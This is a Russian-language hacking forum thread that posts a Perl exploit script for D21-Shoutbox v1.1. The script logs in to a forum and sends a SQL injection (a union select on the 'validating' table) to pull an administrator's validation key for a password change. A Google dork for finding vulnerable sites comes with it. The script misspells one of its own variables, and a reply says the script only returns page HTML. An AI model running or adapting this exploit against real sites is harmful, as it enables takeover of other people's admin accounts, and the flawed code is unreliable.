Web D21-Shoutbox v1.1 Exploit Admin Password Change

[Ŧ1LAN]

D21-Shoutbox v1.1 Exploit Admin Password Change
Эксплоит:

################################################ 
#!/usr/bin/perl                                                                                                                   # 
# D21-Shoutbox v1.1 Exploit Admin Password Change                                                   # 
# Author: Synsta                                                                                                                # 
# Usuage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431                     # 
# Orginal Exploit Found by Windak & langtuhaohoa                                                      # 
################################################ 
use HTTP::Cookies; 
use LWP 5.64; 
use HTTP::Request; 

# variables 
my $login_page = '?act=Login&CODE=01'; 
my $id = ''; 
my $table_fix = ''; 
my $pose_pm_page = '?'; 
my $tries = 5; 
my $sql = ''; 
my $i; 
my $j; 


# objects 
my $ua = LWP::UserAgent->new; 
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0); 
my $resp; 

# init the cookie jar 
$ua->cookie_jar ($cj); 

# allow redirects on post requests 
push @{ $ua->requests_redirectable }, "POST"; 

# get user input 
print 'Shoutbox URL (ex: forumurl.com/forum): '; 
chomp (my $base_url = <STDIN>); 
print 'Your Username: '; 
chomp (my $user = <STDIN>); 
$form{entered_name} = $user; 
print 'Your Password: '; 
# systems without stty will error otherwise 
my $stty = -x '/bin/stty'; 
system 'stty -echo' if $stty;      # to turn off echoing 
chomp (my $pass = <STDIN>); 
system 'stty echo' if $stty;      # to turn it back on 
print "\n" if $stty; 
print 'ID:';   # it'll say next to one of their posts 
chomp (my $id = <STDIN>); 
print 'Table prefix (ex: ibf_): '; 
chomp ( my $table_fix = <STDIN>); 

if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url } 
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' } 

do { 
   $resp = $ua->post ($base_url . $login_page, 
      [ UserName => $user, 
        PassWord => $pass, 
        CookieDate => 1, 
      ]); 
} while ($tries-- && !$resp->is_success()); 


# did we get 200 (OK) ? 
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" } 

# was the pass right ? 
if ($resp->content =~ /sorry, the password was wrong/i) { 
   die "Error: password incorrect.\n"; 
} 

$| = 1; 
print "\nAttempting to extract validation key from the database...\n "; 

$sql = "?act=Shoutbox&view=mycp&sub=ignored&do=add&id=-1 union select vid,1,1 from ".$table_fix."validating where member_id=". $id ."/*"; 
$resp = $ua->get ($base_url . $post_pm_page . $sql ); 

if (!$resp->is_success()) { 
  print "ERROR"; 
} 
else { 
  print ""  ; 
  #print $resp->content; 
  $rs=$resp->content; 
  if ( $rs =~ /uid=([a-z,0-9]{32})/ ) { print "\nValidation Key: ";  print $1; 
   print "\n \nAuthor:  Synsta\n"; 
   print "Website: w4ck1ng.com\n"; 
   print "Usage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431\n"; 
} 
  else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;}    
} 
<STDIN>;

google dork: "Powered By: D21-Shoutbox 1.1"

 

[Dub01]

Чёт я так и не понял работает он или нет! После ввода префикса таблицы БД форума выдаёт HTML код страницы! - где он там пасс админа меняет я не разобрался! :mellow:

У кого-нить получилось чего с ним? :fie: